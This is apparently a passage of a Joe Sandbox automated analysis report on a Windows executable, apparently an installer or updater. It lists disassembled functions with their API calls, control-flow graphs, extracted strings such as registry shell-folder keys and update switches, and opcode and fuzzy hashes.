                                                                                  • GetTimeZoneInformation.KERNELBASE(0000000C,?,?,?,0000000B,0000000B,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B96CC
                                                                                  • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B9762
                                                                                  • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B979B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time$T)R
                                                                                  • API String ID: 3442286286-916455801
                                                                                  • Opcode ID: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                  • Instruction ID: 296538d698a59c5eda49d32dad23ace4f3358159aebf9b8f73aaf73d7ae48b13
                                                                                  • Opcode Fuzzy Hash: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                  • Instruction Fuzzy Hash: 3F614675515244AAD735AF29EC81BA63FE8BF23314F24002FE544862A1D7384DCBE76D
                                                                                  Function 004A1C80 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNELBASE(?,00000000,00000000,00000000,00008CFC), ref: 004A1C9C
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004A1CAB
                                                                                  • FindClose.KERNEL32(00000000), ref: 004A1D40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$FileFirst$Close
                                                                                  • String ID:
                                                                                  • API String ID: 2810966245-0
                                                                                  • Opcode ID: a5debab4b861ac2e1fa388fac5d1a00f88dfb7804d5fee0552107008bfa178c6
                                                                                  • Instruction ID: b831aebb5e4ab5b713a90203a29176eb06b2a27de6e3d4cccf8d6629f1b36694
                                                                                  • Opcode Fuzzy Hash: a5debab4b861ac2e1fa388fac5d1a00f88dfb7804d5fee0552107008bfa178c6
                                                                                  • Instruction Fuzzy Hash: 2921D7354187409BD320CF75D8405DBB7F8EFA9320F008A1ED59987761E778E50987A6
                                                                                  Function 00479232 Relevance: 67.4, APIs: 16, Strings: 22, Instructions: 931sleepfilewindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 239 479232-4792a9 call 4aef44 call 4c5f18 call 4a8605 call 4d4165 6F541CD0 CoInitialize call 49a3d0 250 4792b2-4792b9 call 4cdc20 239->250 251 4792ab-4792b0 call 49a520 239->251 255 4792be-47930e call 4b1fca call 4b1f9b GetModuleFileNameA call 4c2c3a call 4c2892 250->255 251->255 264 479314-479392 call 4c281a call 4c5fe3 call 4c5eaa call 4c2c4d call 4c5fe3 call 4c5f18 call 47a22e 255->264 265 479f58-479f69 call 4cdc20 255->265 292 479394-479399 264->292 293 4793a0-4793dc call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 264->293 269 479f6e 265->269 271 479f70-479f9f call 4c5eaa * 4 269->271 288 479fa1-479faf 271->288 292->293 302 4793de-4793e5 call 46dd46 293->302 303 4793ea-479410 call 4c5f18 call 47a22e 293->303 302->303 309 479416-479432 Sleep call 4c28c2 303->309 310 4796e3-479709 call 4c5f18 call 47a22e 303->310 315 479434-47945e call 4c279e call 4c5fe3 call 4c5eaa 309->315 316 479463-479535 call 40ae8e call 4c5fe3 call 4c613f call 4c60d9 call 4c5fe3 call 4c5eaa * 2 call 4c279e call 40afe1 309->316 322 47970f-47972b Sleep call 4c28c2 310->322 323 4797bd-4797f8 call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 310->323 315->316 380 47953b-4795bd call 4c5f18 call 4c6286 call 4c61b3 call 4c613f call 4c62c2 call 4c5eaa * 2 call 4c5f18 316->380 381 4796c8-4796de call 4c5eaa call 40af5a 316->381 334 47972d-479757 call 4c279e call 4c5fe3 call 4c5eaa 322->334 335 47975c-4797b7 call 4c613f call 4c60d9 call 4c5fe3 call 4c5eaa * 2 SetFileAttributesA DeleteFileA 322->335 358 479803-479808 323->358 359 4797fa-479801 323->359 334->335 335->323 362 47980b-4798c1 call 4c5f18 call 473bec call 4c5f18 call 473bec call 4c6033 GetTempPathA call 4c2c3a call 4c2c4d call 4c5f18 call 47a22e 358->362 359->362 409 4798c3-4798c6 362->409 410 47993c-4799ad call 4c5f18 call 4c5c1f call 47a400 call 4c5fe3 call 4c5eaa call 4c5c1f call 40ca76 362->410 424 4795bf-4795eb call 4c6033 call 4c63cc call 4c28c2 380->424 425 47961d-4796c3 call 4c5eaa Sleep call 4c613f call 4c60d9 call 40e49e call 4c5eaa * 4 call 40af5a 380->425 381->310 409->410 412 4798c8-47990a call 4c279e call 4c5fe3 call 4c5eaa call 4c2c4d GetFileAttributesA 409->412 469 4799af-4799e5 call 4c61b3 call 4cdc20 410->469 470 4799ea-479a14 call 479fb0 call 4c5fe3 call 4c5eaa 410->470 445 479921-479929 GetFileAttributesA 412->445 446 47990c-479920 call 4c5c1f call 40ca76 412->446 454 47960f-47961b 424->454 455 4795ed-47960a call 4c6286 call 4c62c2 call 4c6286 424->455 502 479b37-479b80 call 4c5eaa * 6 425->502 445->410 452 47992b-479937 call 4c5fe3 445->452 446->445 452->410 454->424 454->425 455->454 485 479f09 call 4c5eaa 469->485 491 479a1a-479a24 GetFileAttributesA 470->491 492 479eb9-479f06 call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 470->492 493 479f0e-479f56 call 4c5eaa * 6 485->493 491->492 496 479a2a-479a37 call 46deea 491->496 492->485 493->269 504 479a3c-479a3e 496->504 502->288 508 479a92-479aac call 46e2ec 504->508 509 479a40-479a90 call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 504->509 524 479b85-479ba4 call 4c5c1f call 46e515 508->524 525 479ab2-479aff call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 508->525 556 479b02-479b32 call 4c5eaa * 5 509->556 552 479ba6-479bbc call 4cdc20 524->552 553 479bc1-479c71 call 4c2c3a call 4c5f18 call 473bec call 44ef41 call 4c5c1f call 4167ae call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 524->553 525->556 552->493 592 479c77-479c8b call 4c512e 553->592 593 479cf8-479d0c call 4c512e 553->593 556->502 598 479c8d-479c96 call 46cc81 592->598 599 479c98 592->599 600 479d17 593->600 601 479d0e-479d15 call 474120 593->601 604 479c9a-479cc3 GetDesktopWindow call 4c69ad call 4c9ede 598->604 599->604 602 479d19-479d26 600->602 601->602 606 479d31-479d9b UpdateWindow PostMessageA call 4c5eaa * 6 602->606 607 479d28-479d2c call 4c9592 602->607 618 479cc5-479cd1 call 4cdc20 604->618 619 479cd3-479cf3 call 4c69ad call 4c9543 call 4c9592 604->619 606->271 607->606 618->593 619->593
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00479237
                                                                                  • 6F541CD0.COMCTL32(00523A30), ref: 00479292
                                                                                  • CoInitialize.OLE32(00000000), ref: 00479299
                                                                                    • Part of subcall function 0049A3D0: TlsAlloc.KERNEL32(004792A7,?), ref: 0049A3D9
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,ERROR: Failed to initialize unzip library.,00000000,00000000,?), ref: 004792D9
                                                                                    • Part of subcall function 0049A520: GlobalAlloc.KERNELBASE(00000040,000095B6,7591DF20,00000000,0049D7C5), ref: 0049A534
                                                                                    • Part of subcall function 0049A520: TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                    • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
                                                                                  • Sleep.KERNEL32(000001F4,00523A30,00000000,?,00000000,00510864,?,00514880,?,/TUDEL,00510864,?,?,00000000,?,00000000), ref: 0047962E
                                                                                    • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                    • Part of subcall function 0040AF5A: __EH_prolog.LIBCMT ref: 0040AF5F
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  • GetTempPathA.KERNEL32(00000104,?,update,_UseSystemCharacterSet,?,00000000,_ClientRestarted,?,00000001,00000000,?,/TURC,?,00000000,?,/TUDEL), ref: 00479868
                                                                                  • Sleep.KERNEL32(000001F4,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001,00523C9C,00510870), ref: 0047941B
                                                                                    • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • Sleep.KERNEL32(000001F4,?,/TUDEL,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT), ref: 00479714
                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,00000000,?,00000000,?,?,00523C84,00510870,00514880,00000000,?,00000000,?,/TUCPS), ref: 004797AE
                                                                                  • DeleteFileA.KERNEL32(?,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001), ref: 004797B7
                                                                                  • GetFileAttributesA.KERNELBASE(?,00000000,?,?,00000000,?,00523C80,?,_ir_tu2_temp,?,?,/T:,?,00000000,00510870,?), ref: 00479A1B
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  • GetFileAttributesA.KERNEL32(?,00510870,00000000,?,?,?,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 00479905
                                                                                  • GetFileAttributesA.KERNEL32(?,?,00000000,00510870,?,00000000,0000005C), ref: 00479924
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0040CA76: __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                    • Part of subcall function 0040CA76: GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                    • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CB2D
                                                                                    • Part of subcall function 0040CA76: CreateDirectoryA.KERNELBASE(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                    • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CBF3
                                                                                  • GetDesktopWindow.USER32 ref: 00479CA4
                                                                                  • UpdateWindow.USER32(?), ref: 00479D37
                                                                                  • PostMessageA.USER32(?,00000401,00000000,00000000), ref: 00479D4A
                                                                                    • Part of subcall function 0046CC81: __EH_prolog.LIBCMT ref: 0046CC86
                                                                                    • Part of subcall function 004C9543: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004C8BF3,?,004C8BF3,00000000,?,?,000000FF,000000FF,00000015), ref: 004C956A
                                                                                    • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileH_prolog$AttributesDirectoryWindow$CurrentInterlockedSleeplstrlen$AllocIncrement$CreateDecrementDeleteDesktopF541GlobalInitializeMessageModuleNamePathPostShowTempUpdateValue
                                                                                  • String ID: $ data file (2).$ data file.$/NOAUTOPROXY$/NOFOCUS$/NOINIT$/T:$/TUCPS$/TUDEL$/TURC$ERROR: Failed to initialize unzip library.$Failed to create debug window.$Failed to create temporary folder: $Failed to extract resource files$Failed to find $Failed to load $Invalid application name.$_ClientRestarted$_SilentInstall$_UseSystemCharacterSet$_ir_tu2_temp$update
                                                                                  • API String ID: 4184845147-3327941068
                                                                                  • Opcode ID: 6277aee16f5e9398b87ecda740673180a179f54b45396b2de18384dcf960e3d2
                                                                                  • Instruction ID: feba658612b1a881b226761b1606b2c9e9650df82c332d2741d926b4ffbe1704
                                                                                  • Opcode Fuzzy Hash: 6277aee16f5e9398b87ecda740673180a179f54b45396b2de18384dcf960e3d2
                                                                                  • Instruction Fuzzy Hash: 08829474900648EEDB44EBA5C985FEEBBB8AF15308F10415EF405A3282DB786F49DB35
                                                                                  Function 004352FE Relevance: 53.1, APIs: 3, Strings: 27, Instructions: 575COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 636 4352fe-43536c call 4aef44 call 41ef1b call 41ebe5 call 41ee69 call 4b0108 call 4c5f18 call 4146d3 call 4146d6 652 435371-435393 call 4c5fe3 call 4c5eaa 636->652 657 4353a6-4353d8 call 403af0 652->657 658 435395-4353a1 call 4c5fe3 652->658 664 435590-435593 657->664 665 4353de-4353e1 657->665 663 435a59-435aa7 call 41eea7 call 4815f0 call 45aad3 call 4c5eaa * 2 658->663 666 435679-43567c 664->666 667 435599 664->667 669 435570-43558b call 4c6033 * 2 665->669 670 4353e7-4353ea 665->670 673 4356e9-4356ff call 4c6033 * 2 666->673 674 43567e-435681 666->674 671 435655-435674 call 4c6033 * 2 667->671 672 43559f-4355a2 667->672 727 435704-435707 call 4c6033 669->727 676 4353f0 670->676 677 4354bc-4354bf 670->677 671->727 680 435639-435650 call 4c6033 * 2 672->680 681 4355a8-4355aa 672->681 673->727 682 435683-435684 674->682 683 4356cc-4356e7 call 4c6033 * 2 674->683 686 4354a0-4354b7 call 4c6033 * 2 676->686 687 4353f6-4353f8 676->687 689 4354c5-4354c8 677->689 690 435554-43556b call 4c6033 * 2 677->690 680->727 692 43561d-435634 call 4c6033 * 2 681->692 693 4355ac-4355af 681->693 696 435686-435687 682->696 697 4356af-4356ca call 4c6033 * 2 682->697 683->727 686->727 701 435484-43549b call 4c6033 * 2 687->701 702 4353fe-435401 687->702 705 4354ca-4354cc 689->705 706 435538-43554f call 4c6033 * 2 689->706 690->727 692->727 710 4355b1-4355b4 693->710 711 4355fd-435618 call 4c6033 * 2 693->711 712 435692-4356ad call 4c6033 * 2 696->712 713 435689-435690 696->713 697->727 701->727 723 435403-435405 702->723 724 435468-43547f call 4c6033 * 2 702->724 707 435518-435533 call 4c6033 * 2 705->707 708 4354ce-4354cf 705->708 706->727 707->727 728 4354d1-4354d2 708->728 729 4354f8-435513 call 4c6033 * 2 708->729 731 4355b6-4355b7 710->731 732 4355d9-4355f8 call 4c6033 * 2 710->732 711->727 712->727 733 43570c-435743 call 403d43 call 403d6d call 403d97 call 403e6d 713->733 747 435407-43540a 723->747 748 43544c-435463 call 4c6033 * 2 723->748 724->727 727->733 728->713 751 4354d8-4354f3 call 4c6033 * 2 728->751 729->727 731->713 752 4355bd-4355d4 call 4c6033 * 2 731->752 732->727 820 435795-4357ae GetVersionExA 733->820 821 435745-435787 call 4c5f18 call 40414b call 4c5fe3 call 4c5eaa 733->821 768 435430-435447 call 4c6033 * 2 747->768 769 43540c-43540e 747->769 748->727 751->727 752->727 768->727 769->713 788 435414-43542b call 4c6033 * 2 769->788 788->727 823 4357b4-4357c5 call 4af56e 820->823 824 435a29-435a54 call 4c5eaa * 3 call 404bfb 820->824 821->820 861 435789-435790 call 4c5fe3 821->861 823->824 833 4357cb-4357d2 823->833 824->663 833->824 836 4357d8-4357de 833->836 839 4358e0-4358e3 836->839 840 4357e4 836->840 842 435981-435984 839->842 843 4358e9 839->843 845 4358c7-4358de call 4c6033 * 2 840->845 846 4357ea-4357ed 840->846 848 435986-435989 842->848 849 435998-4359cf call 403d43 call 403d6d call 403d97 call 403e6d 842->849 851 435960-43597f call 4c6033 * 2 843->851 852 4358eb-4358ee 843->852 888 435956-43595e call 4c6033 845->888 854 435853-435856 846->854 855 4357ef 846->855 848->849 857 43598b-43598c 848->857 849->824 930 4359d1-435a12 call 4c5f18 call 40414b call 4c5fe3 call 4c5eaa 849->930 851->888 852->849 858 4358f4-4358f6 852->858 854->849 860 43585c-43585f 854->860 862 4357f1-4357f3 855->862 863 435837-43584e call 4c6033 * 2 855->863 857->849 867 43598e-43598f 857->867 869 4358f8-4358fb 858->869 870 43593f-435951 call 4c6033 * 2 858->870 860->849 872 435865-435867 860->872 861->820 862->849 874 4357f9-4357fc 862->874 863->888 867->849 877 435991 867->877 879 435926-43593d call 4c6033 * 2 869->879 880 4358fd-435900 869->880 870->888 882 4358ab-4358c2 call 4c6033 * 2 872->882 883 435869-43586a 872->883 874->849 885 435802-435804 874->885 877->849 879->888 880->849 890 435906-435907 880->890 882->888 892 43588f-4358a6 call 4c6033 * 2 883->892 893 43586c-43586d 883->893 885->849 886 43580a-43580d 885->886 886->849 897 435813-435815 886->897 888->849 890->877 899 43590d-435924 call 4c6033 * 2 890->899 892->888 893->877 901 435873-43588a call 4c6033 * 2 893->901 897->877 907 43581b-435832 call 4c6033 * 2 897->907 899->888 901->888 907->888 941 435a22 930->941 942 435a14-435a20 call 4c5fe3 930->942 941->824 942->824
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00435303
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00435334
                                                                                    • Part of subcall function 004146D6: __EH_prolog.LIBCMT ref: 004146DB
                                                                                    • Part of subcall function 004146D6: SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                    • Part of subcall function 004146D6: SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                    • Part of subcall function 004146D6: SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                    • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 0041474D
                                                                                    • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 00414760
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • GetVersionExA.KERNEL32(?,00000000,00020019,00000000,00000000,00000000,00000000,?,?,?,Common Documents,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,LocalMachine,00000000,00000000,00523A30), ref: 004357A6
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlockedlstrlen$DecrementFolderFromIncrementListLocationMallocPathSpecialVersion__ftol
                                                                                  • String ID: AppData$Common AppData$Common Desktop$Common Documents$Common Programs$Common Start Menu$Common Startup$CommonFilesDir$CommonMusic$CommonPictures$CommonVideo$CurrentUser$Desktop$Fonts$Local AppData$LocalMachine$My Music$My Pictures$My Video$Personal$ProgramFilesDir$Programs$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Start Menu$Startup
                                                                                  • API String ID: 3622249116-2480596902
                                                                                  • Opcode ID: e03679393c3a09c7855a47103bf3111eaa459b369e773bf6e8c36d1d0aad8403
                                                                                  • Instruction ID: 2500f404392f3e3392d40bcb7433cb23fa29a4595c5d115e66c929809bea2158
                                                                                  • Opcode Fuzzy Hash: e03679393c3a09c7855a47103bf3111eaa459b369e773bf6e8c36d1d0aad8403
                                                                                  • Instruction Fuzzy Hash: 6F129474800549EADB1CEBAADC96EFEBB74BF24348F00502FF102721D1DA785B85CA59
                                                                                  Function 004D4511 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 945 4d4511-4d452e RtlEnterCriticalSection 946 4d453d-4d4542 945->946 947 4d4530-4d4537 945->947 949 4d455f-4d4568 946->949 950 4d4544-4d4547 946->950 947->946 948 4d45f6-4d45f9 947->948 954 4d45fb-4d45fe 948->954 955 4d4601-4d4622 RtlLeaveCriticalSection 948->955 952 4d457d-4d4599 GlobalHandle GlobalUnlock GlobalReAlloc 949->952 953 4d456a-4d457b GlobalAlloc 949->953 951 4d454a-4d454d 950->951 956 4d454f-4d4555 951->956 957 4d4557-4d4559 951->957 958 4d459f-4d45ab 952->958 953->958 954->955 956->951 956->957 957->948 957->949 959 4d45ad-4d45c3 GlobalHandle GlobalLock RtlLeaveCriticalSection call 4c23d5 958->959 960 4d45c8-4d45f5 GlobalLock call 4af060 958->960 959->960 960->948
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D4520
                                                                                  • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,005265C0,005265C0,004D48AC,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?), ref: 004D4575
                                                                                  • GlobalHandle.KERNEL32(006E4400), ref: 004D457E
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004D4587
                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004D4599
                                                                                  • GlobalHandle.KERNEL32(006E4400), ref: 004D45B0
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004D45B7
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 004D45BD
                                                                                  • GlobalLock.KERNEL32(?), ref: 004D45CC
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 004D4615
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2667261700-0
                                                                                  • Opcode ID: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                  • Instruction ID: 774bed1611e3bd0e6d57176e341f86d252de02ce4c917f3a2881162e47e93bbe
                                                                                  • Opcode Fuzzy Hash: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                  • Instruction Fuzzy Hash: 0731B271600305AFD7209F28ECA9A2AB7E9FB84305F05093FF952C7762E775E8048B14
                                                                                  Function 0046DEEA Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 287COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046DEEF
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041D254: __EH_prolog.LIBCMT ref: 0041D259
                                                                                    • Part of subcall function 0041733C: __EH_prolog.LIBCMT ref: 00417341
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
